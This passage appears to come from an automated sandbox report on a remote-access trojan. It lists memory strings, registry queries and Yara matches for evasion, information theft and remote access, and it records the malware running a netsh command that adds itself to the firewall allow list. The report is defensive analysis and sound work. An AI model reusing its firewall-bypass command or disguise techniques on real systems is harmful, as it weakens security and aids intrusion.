Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 01:47:09 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 14:47:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 06:56:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:43:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:36:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 06:18:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:16:58 - Program Manager
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Shell_traywnd+MostrarBarraDeTarefas
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 04:05:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 12:37:17 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:26:00 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/20 | 00:10:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 08:21:35 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:36:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 23:53:49 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/26 | 09:36:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:53:00 - Program Manager
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,GetLocaleInfoA, 4_2_00B37208
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 1_2_00AE1718
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1820C GetTimeZoneInformation, 4_2_00A1820C
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 1_2_00AE139F
Source: C:\Users\user\AppData\Local\Temp\server.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\server.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
Source: C:\Users\user\AppData\Local\Temp\server.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 4888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 1216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 64, type: MEMORYSTR
Source: Yara match File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 4888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 1216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RRqyIX.exe PID: 64, type: MEMORYSTR
Source: Yara match File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR